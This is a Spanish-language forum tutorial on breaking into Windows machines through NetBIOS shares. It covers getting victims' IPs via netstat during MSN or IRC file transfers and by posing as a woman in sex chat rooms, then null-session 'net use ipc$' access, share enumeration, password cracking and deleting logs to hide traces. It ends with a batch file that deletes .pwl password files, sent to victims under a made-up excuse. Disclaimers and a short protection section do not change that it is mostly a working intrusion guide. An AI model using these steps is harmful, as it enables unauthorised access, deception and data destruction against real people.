Antes de empezar a explicar como introducirse en una maquina que tenga el netbios habilitado y que comparta archivos e impresoras he de decir que este método tiene unos riegos que son los siguientes:

Cuando intentas obtener la ip de la “victima” ella también puede obtener tu ip.

Para poder entrar en el ordenador de alguien de esta manera has de habilitar el netbios, compartir archivos e impresoras y marcar también cliente para redes Microsoft en las propiedades de la conexión (esto seria para xp/2000) o ir a inicio/configuración/panel de control/redes y hacer lo mismo (para windows 95/98/Me) si miras lo que he dicho al principio verás que para entrar en un ordenador de esta manera se ha de habilitar lo mismo que para atacarlo lo que quiere decir que para que puedas entrar en otro ordenador de esta manera has de arriesgarte a que a ti te puedan entrar. Para solucionar esto solo te tienes que descargar un buen cortafuegos y ya no te podrán entrar por netbios aunque lo tengas habilitado.

Otro riesgo es que entrar al ordenador de otra persona esta penado por la ley, yo solo he puesto este texto para que aprendáis así que no me hago responsable de lo que hagáis con esta información.

Acordaos de esto:

El ordenador al que entráis es de otra persona, y al igual que vosotros a esa persona tampoco le gustará que le robéis sus datos o sus contraseñas, que le pongáis algún troyano, que le borréis archivos, ni que hagáis nada para aseguraros que podréis volver a entrar fácilmente, etc. Yo no os voy a decir lo que dicen la mayoría de tutoriales de que hagáis lo que queráis con la información que os he dado, si hacéis alguna de las cosas que he dicho antes no seréis nada más que crackers y no respetaréis la privacidad de las personas que utilicen ese ordenador, me gustaría que les escribieseis en un documento con formato .txt que tienen que hacer para que no les vuelvan a entrar de esa manera 8si queréis también podéis poner una firma) estoy seguro que el/los usuario/s del ordenador os lo agradecerán.

Intentad borrar vuestras huellas para ello tenéis que ir a esta carpeta %systemroot%\system32\LogFiles y has de borrar todos los archivos .log que tengan tu ip, no te aseguro que así borrarás todas tus huellas, normalmente hay algunos programas que también registran tus huellas sobretodo los cortafuegos, pero si la persona tiene el netbios habilitado (seguramente es que no sabe mucho) y por lo tanto que no sabrá buscar las huellas.

Ya se que es un poco pesado leer esto y que normalmente se pone lo ultimo pero creo que es mejor que ponga todo lo anterior al principio para que se lo lea el mayor numero de gente posible.

Pasos para entrar a un ordenador mediante netbios:

1.- Encontrar la manera de conseguir su ip.

1.1-La victima esta hablando contigo por el Messenger:

1.1.1- Primero le preguntas que tipo de conexión a internet tiene y que versión del msn Messenger tiene.

1.1.1.1- Tiene adsl y una versión del msn Messenger anterior al msn Messenger 6.1:

Cierra todas las ventanas que puedan estar utilizando internet, navegadores, programas peer to peer (sobretodo estos últimos o os complicaréis la vida), etc. Abre una ventana del símbolo de sistema o MS-DOS (dependiendo de la versión del windows que tengas el nombre varia) y si la ruta no es C:> pon cd.. hasta que la ruta sea C:> (Lo digo para haceros más fácil la búsqueda del documento) después pon netstat –n > nombre_documento.txt (esto lo que hace es mirar los puertos que tienes abiertos y crear un documento con formato .txt con la información), ahora es el momento de enviarle un archivo de unos 2 MB para tener tiempo de sobra para hacer el próximo netstat, una vez que se esta enviando el archivo pon en el MS-DOS (o símbolo de sistema) netstat –n > nombre_documento2.txt. Ahora lo que tienes que hacer es comparar los dos documentos de texto y mirar que ip esta en el segundo que no esta en el primero y ya tendrás su ip.

1.1.1.2-Tiene adsl y una versión del msn Messenger anterior al msn Messenger 6.1:

Cierra todas las ventanas que puedan estar utilizando internet, navegadores, programas peer to peer (sobretodo estos últimos o os complicaréis la vida), etc. Abre una ventana del símbolo de sistema o MS-DOS (dependiendo de la versión del windows que tengas el nombre varia) y si la ruta no es C:> pon cd.. hasta que la ruta sea C:> (Lo digo para haceros más fácil la búsqueda del documento) después pon netstat –a > nombre_documento.txt (esto lo que hace es mirar los puertos que tienes abiertos y crear un documento con formato .txt con la información), ahora es el momento de enviarle un archivo de unos 2 MB para tener tiempo de sobra para hacer el próximo netstat, una vez que se esta enviando el archivo pon en el MS-DOS (o símbolo de sistema) netstat –a > nombre_documento2.txt. Ahora lo que tienes que hacer es comparar los dos documentos de texto y mirar que ip esta en el segundo que no esta en el primero y ya tendrás su ip.

1.1.1.3.-Su versión del msn Messenger es posterior al msm Messenger 6.1:

Utilizad la ingeniería social para que os envié un correo electrónico, vais a la bandeja de entrada, mirad por la derecha y arriba veréis que pone opciones le dais, después le dais a correo en la nueva ventana que os salga, después le dais a configuración de la pantalla de correo y donde pone encabezados de mensajes poned Avanzado, ahora miráis el correo que os ha enviado la victima y veréis su ip.

1.2.- Por el mirc:

1.2.1.- Id a un canal de juegos online esperad un rato y a los cinco minutos tendréis un montón de ip’s con las que probar.

1.2.2.- Haceros pasar por una tía y meteros en un canal de sexo en unos segundos tendréis más de 30 ventanas abiertas utilizad la ingeniería social para conseguir enviarles un archivo, descargaros una foto de una tía que no este mal (si esta muy buena sospecharán que la foto no es vuestra) o pedidle al tío que os envié una foto suya (intentad preguntarle d la forma mas disimulada posible que conexión a internet tiene)

Antes de enviarle la foto o d k os la envié cierra todas las ventanas que puedan estar utilizando internet, navegadores, programas peer to peer (sobretodo estos últimos o os complicaréis la vida), etc. Abre una ventana del símbolo de sistema o MS-DOS (dependiendo de la versión del windows que tengas el nombre varia) y si la ruta no es C:> pon cd.. hasta que la ruta sea C:> (lo digo para haceros más fácil la búsqueda del documento) después pon netstat –a o –n (depende de la conexión k tenga la victima, para adsl –n , para conexión normal –a)> nombre_documento.txt (esto lo que hace es mirar los puertos que tienes abiertos y crear un documento con formato .txt con la información), ahora es el momento de enviarle el archivo, una vez que se esta enviando el archivo pon en el MS-DOS ( o símbolo de sistema) netstat –a o –n (lo mismo k la anterior)> nombre_documento2.txt. Ahora lo que tienes que hacer es comparar los dos documentos de texto y mirar que ip esta en el segundo que no esta en el primero y ya tendrás su ip.

2.- Abrir el MS-DOS(a partir de ahora no voy a poner más o símbolo de sistema, solo pondré MS-DOS, lo mejor es no cerrarlo, si cuando digo abrir lo tenéis abierto no hace falta que lo volváis a abrir). Poned nbtstat –a XXX.XXX.XXX.XXX (las X se substituyen por la ip de la “victima”)

Si os sale alguna entrada <20> es que comparte algo y por lo tanto que podéis entrarle de esta forma sino tendréis que volver al paso 1.

Ejemplos de lo que puede salir: (ip y resultados inventados para no perjudicar a terceras personas)

Nbtstat –a 89.34.66.234

Host not encontrado (vete al paso 1)

Nbtstat –a 90.78.43.134

Netbios remote machina name table

Nombre Tipo Estado

David <00> único Registrado

David <03> único Registrado

Compañeros <00> grupo Registrado

Compañeros <00> grupo Registrado

Dirección MAC = 00-00-00-12-00-21

Nbtstat –a 21.67.123.245

Netbios remote machine name table

Nombre Tipo Estado

Jaime <00> único Registrado

Jaime <20> único Registrado

Workgroup <00> Grupo Registrado

Workgroup <1E> Grupo Registrado

Dirección MAC = 00-23-21-00-00-31-00

3.- Iniciar sesión nula

net use \\XXX.XXX.XXX.XXX\ipc$ “” /user:””

Ejemplo:

Net use \\21.67.123.245\ipc$ “” /user:””

Se ha completado el comando correctamente (esto es el resultado)

Si nos sale bien mirad si habéis puesto bien los espacios eso suele ser lo que más problemas da.

4.-Mirar que comparte

net view \\Primer nombre con <00> y que sea del tipo único

Ejemplo:

Net view \\Jaime

(Cosas que te pueden salir)

Error de sistema 53

No se ha encontrado la ruta de acceso a la red

(Intenta volver a hacerlo desde el paso 2, puede que hayas hecho algo mal, lo más seguro es que sea la sesión nula)

Error de sistema 5

Acceso denegado

(Este te lo vas a tener que currar un poco más de lo normal porque tiene contraseña)

O si tienes suerte y la carpeta compartida no tiene contraseña te saldrán las cosas que comparte:

Compartido Tipo Comentario

CDROM Disco

C Disco

IMPRES Impresora

5.-Meterse en el ordenador de la “victima”

Dale a Inicio/Ejecutar y pon \\Jaime (donde Jaime es el primer nombre con <00> y que es del tipo único y ya estarás dentro.

Ventana que sale cuando los recursos compartidos tienen contraseña

6.-Crackear contraseña

Descargate algún crackeador de contraseñas (el john the ripper es uno de los mejores y más famosos), léete un manual para aprender a utilizarlo y crackea la contraseña.

¿Qué esperabas, que te lo dijese todo? Si de verdad quieres entrar te esforzarás, te descargarás el crackeador, el manual y al final lo conseguirás. Te aseguro que lo hago por tu bien para que aprendas si coges un tutorial y te dice todo lo que has de poner puede que no te enteres de nada, también lo hago para que los lammers no empiecen a entrar a ordenadores poco protegidos y lo destrocen todo.

7.-Protegerse de este método de intrusión:

7.1.-Para protegerse de este método de intrusión solo os tenéis que deshabilitar el netbios, compartir archivos e impresoras y marcar también cliente para redes Microsoft en las propiedades de la conexión (esto seria para xp/2000) o ir a inicio/configuración/panel de control/redes y hacer lo mismo (para windows 95/98/Me) para mayor seguridad lo que tenéis que hacer es poneros un cortafuegos que os protegerá de esta y otras amenazas.

7.2.-Cuando descubrí las bombas bat pensé que si podían borrar cualquier archivo puede que también se pudiesen programar para borrar archivos con un formato especifico y según lo que me han dicho si que se puede hacer, así que ya tengo la solución para hackear sin utilizar programas hechos por otros, antes de explicar como hacerlo os voy a decir que yo no lo he probado aún (por lo que no os puedo asegurar que funcione) el motivo por el cual no lo he probado es una norma de la ética de los hackers a la que al principio no encontraba mucho sentido “no hackees sistemas pobres que no puedan recuperarse” yo pensaba que por el solo hecho de entrar en el ordenador de otra persona no se le podía hacer ningún daño ni al software ni al hardware por lo tanto no había ningún motivo por el cual la “victima” no se pudiese recuperar, ahora me he dado cuenta de que hay veces que para acceder a un ordenador un poco protegido se pueden dañar algunas cosas como borrar la contraseña para poder acceder tranquilamente, borrar el antivirus y el cortafuegos para que no te detecten programas sospechosos y te dejen tranquilo, etc. Una vez hecho esto y aunque tu no le borres ni hagas nada, el ordenador se habrá quedado sin ninguna protección por lo que otras personas con intenciones peores que las tuyas podría entrar fácilmente a su ordenador y hacerle de todo, borrarle el disco duro, ponerle un troyano, un keylogger, etc y así quitarle contraseñas y archivos privados, pero el mayor daño que se puede causar no es este sino el que podría producir un virus que cambiase algunos parámetros de la bios y que hiciese creer al ordenador que la temperatura es inferior a la que en realidad esta, así puede que el ventilador se parase y por culpa de el calor se acabase quemando placa base y algunos otros componentes que pueden llegar a resultar bastante caros.

Una vez explicado esto voy a explicaros como se hace para quitar las contraseñas y por lo tanto entrar poniendo la contraseña que quieras, como ya he dicho antes no me hago responsable de lo que hagáis con la información que os doy y os pido que esta técnica la utilicéis la menor cantidad de veces posible o aún mejor no la utilicéis.

Dadle con el botón secundario del ratón en un sitio del escritorio en el que no haya nada, después le dais a nuevo y documento de texto, poned:

Echo off

Cls

Del: c:\windows\*.pwl \y

Le dais a archivo/guardar como y poned nombre.bat.

Dónde pone nombre poned el nombre que queráis, el formato es lo único que no podéis cambiar.

¿Cómo hacer que llegue a la “victima”?

Lo mejor es que se lo hagáis llegar por el Messenger, el mirc o alguna otra forma que sea directa, (si se lo enviáis mediante el correo electrónico puede que pase bastante tiempo hasta que le podáis hackear y por tanto que este bastante tiempo sin contraseñas) una vez que le hayáis hacheado avisadle de que se ponga una nueva contraseña.

¿Una vez que ha llegado que excusa utilizar para que no sospeche al ver que no funciona?

Si ha abierto el archivo seguramente no sabrá mucho de informática o confía en vosotros, decidle ¿tu no tienes la librería setup.dll? (o algo que os inventéis) (en forma de pregunta para que piense que vosotros pensabais que el lo tenia) seguro que os responderá que no, le decís que os tenéis que desconectar antes que pregunte si le puedes pasar la librería y ya esta.

Si tenéis alguna duda o comentario ponedlo en el foro.